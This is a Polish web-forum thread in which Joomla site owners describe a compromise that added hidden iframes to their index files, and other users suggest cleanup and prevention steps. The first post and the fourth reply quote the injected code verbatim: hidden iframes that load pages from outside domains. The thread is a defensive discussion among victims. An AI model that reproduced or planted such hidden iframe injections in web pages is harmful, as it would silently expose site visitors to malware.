Niechciane iframe w plikach index
Strona 1 z 3 123 OstatniOstatni
Wyniki 1 do 10 z 28

Temat: Niechciane iframe w plikach index

  1. #1
    Debiutant
    Dołączył
    22-02-2007
    Wpisy
    6
    Punkty
    10

    Domyślny Niechciane iframe w plikach index

    Witam,
    korzystam z Joomla 1.5.8 i w dniu dzisiejszym o 15.00 wszystkie pliki index oraz home (php, html) na serwerze dostały dopisek:
    Kod PHP:
    <?php echo '<div style="visibility:hidden"><iframe src="http://directlinkq.cn/in.cgi?27" width=100 height=80></iframe></div>'?>
    Niezwłocznie wgrałem kopie wszystkich plików bez tych dopisków i zmieniłem hasła.
    Czy jest jakiś sposób na uniknięcie takich wypadków w przyszłości? Chmody miałem ustawione wszędzie zgodnie z zaleceniami.
    Jeżeli ktoś ma jakieś doświadczenia w podobnej sprawie, to bardzo proszę o pomoc.

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2

  4. #3
    Debiutant
    Dołączył
    22-02-2007
    Wpisy
    6
    Punkty
    10

    Domyślny

    Czytałem już to wcześniej
    A tak na poważnie, to jest jakiś złoty środek na tego typu zdarzenia? Wszystkie prawa dostępu mam ustawione na 755 foldery i 644 pliki.

  5. #4
    Wyjadacz
    Dołączył
    09-03-2006
    Wpisy
    653
    Punkty
    12

    Domyślny

    Mnie także to spotkało 22.12 ale na Joomla 1,015, dopisek do wszystkich plików index
    <iframe src="http://thedeadpit.com/?click=406546" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    Hasła mam dość wymyślne, chmody także solidne, a tu taka nimiła niespodzianka. Jak się przed tym paskudztwem można jeszcze zabezpieczyć ?

  6. #5
    Wiarus Dylek awatar
    Dołączył
    20-09-2005
    Skąd
    Białystok
    Wpisy
    2 864
    Punkty
    70

    Domyślny

    Pamietajcie podstawowa rzecz - chocby najnowsza Joomla - to wlamy najczesciej sa przez STARE dodatkowe skladniki - komponenty itp.

  7. #6
    Debiutant
    Dołączył
    22-02-2007
    Wpisy
    6
    Punkty
    10

    Domyślny

    Ja się czuję bezsilny, bo korzystam z najnowszej wersji Joomla 1.5.8, wszystkie komponenty są również uaktualnione do aktualnych edycji. Więc nie mam czego uaktualnić na chwilę obecną.
    Chmody ustawione według zaleceń, hasła pozmieniałem po ataku, przywróciłem na serwer właściwe pliki index. Na razie jest spokój, ale tylko czekać na powtórkę z rozrywki.
    Najgorsze, że nigdzie nie można znaleźć jakiejś konkretnej metody co dokładnie można zrobić, aby zapobiec tym wkurzającym działaniom. Przeszukałem zagraniczne fota i nic konkretnego.

  8. #7
    Blokowany
    Dołączył
    09-08-2008
    Wpisy
    154
    Punkty
    9

    Domyślny

    dobra - a co zrobić jeśli już taki złośliwiec się pokarze w plikach a nie ma możliwości skorzystania z Backupu?

    U mnie sprawa wygląda tak, ze iframe (linku nie podaje, bo jeszcze ktoś kliknie) Pojawia sie na każdej podstronie gdzie mają się pojawić artykuły.

    na podstronei z Forum, czy formularzem kontaktowym nie ma.
    Problem w tym, ze nei wiem gdzie szukac tego fragmentu kodu, bu go poprostu skasowac...

    Czy ktloś ma jakiś pomysl?

  9. #8
    Wyjadacz
    Dołączył
    09-03-2006
    Wpisy
    653
    Punkty
    12

    Domyślny

    Wtedy pozostaje zastosować Windows Commandera i wszystkie zmodyfikowane przez trojana pliki trzeba poprawić i wyciąć iframe ręcznie. Sam to przerobiłem. Głównie są zmodyfikowane pliki index. szablonów, componentów, modułów

  10. #9
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 315
    Punkty
    1142

    Domyślny

    Zapomniałeś dodać, że tego Windows Commandera trzeba najpierw odwirusować!
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  11. #10
    Wyjadacz
    Dołączył
    09-03-2006
    Wpisy
    653
    Punkty
    12

    Domyślny

    Tak oczywiście odwirusować i to odpalając program antywirusowy w trybie awaryjnym systemu bo niektóre klony tego trojana usuwane bezprośrednio w trybie normalnym pojawiają się ponownie i trzeba ponownie rzeźbić pliki. Poza tym po usunięciu trojana, koniecznie zmienić hasło do FTP i Joomla.

Strona 1 z 3 123 OstatniOstatni

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •